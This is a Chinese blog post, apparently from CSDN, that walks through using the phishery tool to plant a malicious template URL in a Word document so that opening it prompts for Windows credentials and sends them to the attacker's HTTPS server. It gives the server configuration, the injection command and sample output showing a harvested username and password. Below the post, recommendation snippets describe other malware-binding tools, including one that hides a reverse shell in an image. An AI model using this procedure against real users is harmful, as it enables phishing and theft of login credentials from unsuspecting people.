使用恶意捆绑URL工具入侵Windows(恶意文档利用)

最新推荐文章于 2023-03-27 14:11:34 发布
最新推荐文章于 2023-03-27 14:11:34 发布
阅读量574 收藏
点赞数
文章标签: 恶意捆绑文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43504064/article/details/100627889
版权

恶意盗取Windows 登录密码的Word 文档

通过使用phishery工具将恶意url注入到word文档,这将导致MicrosoftWord向URL发出请求,从而向最终用户显示身份验证对话框。可以使用phishery的URL注入任何.docx文件。

第一步:根据需要修改提供的setings.json文件,默认情况下它应该如下所示

{
“ip”: “0.0.0.0”,
“port”: “443”,
“sslCert”: “server.crt”,
“sslKey”: “server.key”,
“basicRealm”: “Secure Document Gateway”,
“responseStatus”: 200,
“responseFile”: “template.dotx”,
“responseHeaders”: [
[“Content-Type”, “application/vnd.openxmlformats-officedocument.wordprocessingml.template”]
]
}

此设置将启动端口上的HTTP服务器443将SSL配置为使用Server.crt和Server.key…基本身份验证域设置为安全文档网关…当提供任何凭据时,200响应状态与包含的内容一起发送。Template.dotx以及内容类型标题:内容类型:applicationvnd.openxmlformats-officedocument.wordprocessingml.template.

第二步:还可以将设置文件配置为输出一个简单的主体,方法是使用响应体,就像这样:

在这里插入图片描述

第三步:服务器配置完毕,现在我们将对word文档进行注入恶意url工作(攻击操作)

$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
[+] Opening Word document: good.docx(打开一个叫Good文档)
[+] Setting Word document template to: https://secure.site.local/docs(将文档注入指定url)
[+] Saving injected Word documentto: bad.docx(保存该文档)
[*] Injected Word document has been saved!(已经保存)
注意:确保您的phishery服务器正在运行,并在您使用的URL上可用。现在,打开Word文档时,将提示受害者使用身份验证对话框(账户登录)。当目标将用户名和密码输入进去那么我这边终端将显示用户名和密码。

最后一步:现在,当受害者打开文档时,您将看到以下内容

$ ./phishery
[+] Credential store initialized at: credentials.json
[+] Starting HTTPS Auth Server on: 0.0.0.0:443
[] Request Received at 2019-09-05 01:06:28: HEAD https://secure.site.local/docs
[] Sending Basic Auth response to: 10.117.0.111
[*] New credentials harvested!
[HTTP] Host : secure.example.local
[HTTP] Request : /docs
[HTTP] User Agent : Microsoft Office Word
[HTTP] IP Address : 10.117.0.111
[AUTH] Username : Admin
[AUTH] Password : abx.123

上当IP:10.117.0.111
用户名Admin
密码abx.123

原理

通过往WORD文件里注入指定恶意URL会直接导致用户打开文档后会与KALI建立一个连接,导致目标计算机弹出一个关于登陆用户的窗口此时如果登陆那么你的电脑登陆账户将被泄露在KALI

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows自带捆绑使用方法.pdf
12-02
Windows自带捆绑使用方法.pdf
url-all-info”浏览器恶意插件窃密木马分析
qq_53058639的博客
07-21 108
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4y005bri-1689954350849)(https://image.3001.net/images/20211209/1639017298_61b16b52344fef345db03.png!5、继续运行发现url窃密代码,该代码也做了16进制编码、混淆,该代码会过滤政府、教育网站。1、通过以上简单分析很容易发现浏览器被恶意劫持了,浏览器劫持一般有DNS、驱动劫持、恶意插件劫持等。6、继续调试会发现会将。
图片后门恶意捆绑工具FackImageexploer
dfdhxb995397的博客
12-27 654
本文作者:夜莺 今天向大家提个醒,最近有一款工具名叫FackImageexploer,该工具能够将恶意的.bat和.exe程序与图片绑定在一起,假若受害者点击了图片,就会反弹个shell给不法分子,如此我们就被别人控制了。这里讲述下不法分子是如何利用这个工具去生成恶意图片。 首先,在Kali中输入以下地址去下载我们的工具: git clonehttps://github....
恶意软件、恶意软件反杀技术以及反病毒技术的详细介绍
qq_65975148的博客
03-27 670
恶意软件,恶意软件反杀技术、反病毒网关
恶意URL数据集
xyh_qianxiao的博客
04-20 3783
一些URL数据集的收集来源 1、https://openphish.com/feed.txt 2、https://ransomwaretracker.abuse.ch/blocklist/ 3、https://www.phishtank.com/ 4、 4、https://blog.csdn.net/Eastmount/article/details/108434835
【总结】恶意软件及反病毒技术
dyslhl的博客
09-22 1500
恶意软件及反病毒技术
压缩格式,文档格式,EXE格式捆绑工具.exe
06-21
winror,exe,wod文件捆绑使用前请关闭杀毒软件,软件仅供学习使用,请勿违法使用,后果自负。
开源恶意程序对抗工具 OpenArk 1.3.0
03-20
Ark是Anti-Rootkit(对抗恶意程序)的简写, OpenArk目标成为逆向工程师、编程人员的工具,同时也能为那些希望清理恶意软件的用户服务。 功能特点: 进程 – 查看进程、线程、模块、句柄、内存、窗口等信息,还有...
Windows 复制增强工具 Copy Handler 1.46 + x64 中文.rar
05-05
Copy Handler 是一种功能强大的 Windows 工具,旨在比操作系统中捆绑的标准功能更快地将文件从一个文件夹复制和移动到另一个文件夹。 当然,该应用程序还提供了其他几个实用程序,包括一个功能强大的界面,该界面...
易语言文件捆绑工具
08-21
易语言文件捆绑工具源码系统结构:去除文件名路径, ======窗口程序集1 || ||------_按钮1_被单击 || ||------_按钮2_被单击 || ||------去除文件名路径 || ||------_按钮3_被单击 || ||------_按钮4_被单击
恶意url.txt
06-10
纯文本URL列表(仅限URL) 在纯文本的URL列表是已知URLhaus所有恶意软件URL的转储。除了每行一个URL之外,它不包含任何其他内容,如果您想将URLhaus数据集用作IOC(Compromise指标),这将非常有用。您可以将它们与安全性过滤器的某些日志文件进行匹配,例如Web代理日志。您也可以将其用作具有低误报率的阻止列表。 纯文本URL列表每5分钟生成一次。请不要每隔5分钟取一次。
DDoS木马-Tsunami家族样本分析
人饭子的博客
11-06 529
#sidebar { position: absolute; top: 0; left: 0; bottom: 0; width: 250px; padding: 0; margin: 0; overflow: auto } #page-container { position: absolute; top: 0; left: 0; margin: 0; padding: 0; bord...
url攻击小常识
liupeng20111308043的专栏
08-07 5874
有时候程序员为了偷懒或者是在无意识的情况下缺少了对外部数据的过滤,Web安全习惯上将所有用户输入的数据假定为受污染的数据(即可能带有攻击性的数据),现在比较流行的XSS(跨站脚本攻击)就是利用对用户输入过滤不完全而进行的攻击,因为用户数据过滤不完全会导致很多很多问题,希望读者能够最大限度的注意过滤用户输入。 部分来自转发贴: 介绍几种比较常见的表单及URL攻击方式1)表单数据泄漏攻击 这个一般
基础认证伪造工具phishery
weixin_34174322的博客
07-03 125
2019独角兽企业重金招聘Python工程师标准>>> ...
恶意url_预测URL恶意
weixin_26722031的博客
08-01 3448
恶意urlIn this article, we walk through developing a simple feature set representation for identifying malicious URLs. We will create feature vectors for URLs and use these to develop a classification m...
电子、通信、计算机大类学生课程实验的心得体会
05-01
电子、通信、计算机大类学生课程实验的心得体会 电子、通信、计算机大类的学生课程实验是工科教育中非常重要的一环,它不仅能够加深学生对理论知识的理解,还能培养学生的实践能力和创新思维。
【营销】任务一金融产品与金融产品营销认识.docx
05-01
【营销】任务一金融产品与金融产品营销认识.docx
单片机课程实验-秒表实现
05-01
1.了解LED数码管的工作原理,为秒表时钟模块的实现打下基础。 LED数码管是一种常用的数字显示器件,通过控制每个LED的亮灭来显示数字。在秒表时钟模块中,我们需要利用LED数码管的这一特性,通过单片机控制数码管的显示,从而实现时钟的功能。因此,了解LED数码管的工作原理对于实现秒表时钟模块至关重要。 2.掌握51单片机与LED数码管的接口技术,是实现秒表时钟模块的关键。 51单片机是一种常用的微控制器,可以通过接口与外部设备进行通信。在秒表时钟模块中,我们需要通过单片机与LED数码管之间的接口,控制数码管的显示。因此,掌握51单片机与LED数码管的接口技术是实现秒表时钟模块的关键。在实际操作中,我们需要根据接口协议和数据传输方式,编写相应的程序来控制数码管的显示。 3.合理利用定时器/计数器,是实现秒表时钟模块的效率保障。 在秒表时钟模块中,我们需要实现计时功能,这需要使用到定时器/计数器。定时器/计数器可以用来产生计时脉冲,从而控制秒表的计时。通过合理利用定时器/计数器,可以提高秒表时钟模块的计时精度和效率。在实际操作中,我们需要根据具体的应用场景和需求,选择合适的定时器/计数器参
基于LSTM的SDN流量预测与负载均衡python源码+详细注释+数据.zip
最新发布
05-01
个人98分期末大作业项目,代码完整下载可用。主要针对计算机相关专业的正在做课程设计和期末大作业的学生和需要项目实战练习的学习者。包含全部项目源码、该项目可以直接使用、项目都经过严格调试,下载即用确保可以运行!
各类恶意代码 描述特征
06-10
恶意代码是指一类有意破坏计算机系统、篡改数据或者盗取隐私信息等恶意行为的软件程序。以下是一些常见的恶意代码及其特征: 1. 病毒:病毒是一种能够自我复制的恶意程序,它会植入到其他合法程序中,通过感染其他文件来传播。常见的病毒有 Melissa 病毒、ILOVEYOU 病毒等。 2. 蠕虫:蠕虫是一种与病毒类似的恶意程序,但它不需要植入到其他程序中,而是通过网络传播。蠕虫会利用网络漏洞或者弱口令等方式入侵其他计算机,然后通过网络传播自身。常见的蠕虫有 Nimda 蠕虫、Blaster 蠕虫等。 3. 木马:木马是一种通过隐藏在合法程序中的恶意代码,可以在用户不知情的情况下控制计算机。常见的木马有 Netbus、Back Orifice 等。 4. 间谍软件:间谍软件是一种可以监视用户计算机活动的恶意程序,它可以记录键盘输入、屏幕截图、网络通信等信息,然后将这些信息发送给攻击者。常见的间谍软件有 Perfect Keylogger、Spyware 等。 5. 广告软件:广告软件是一种常见的恶意程序,它会在用户计算机上弹出广告窗口,或者在浏览器中插入广告。广告软件通常是通过软件捆绑恶意广告等方式传播的。常见的广告软件有 Adware、Browser Hijacker 等。 这些恶意代码通常都会对计算机系统造成不同程度的破坏和危害,用户应该经常更新杀毒软件、防火墙等安全软件,提高自己的安全防范意识,以保护自己的计算机和信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值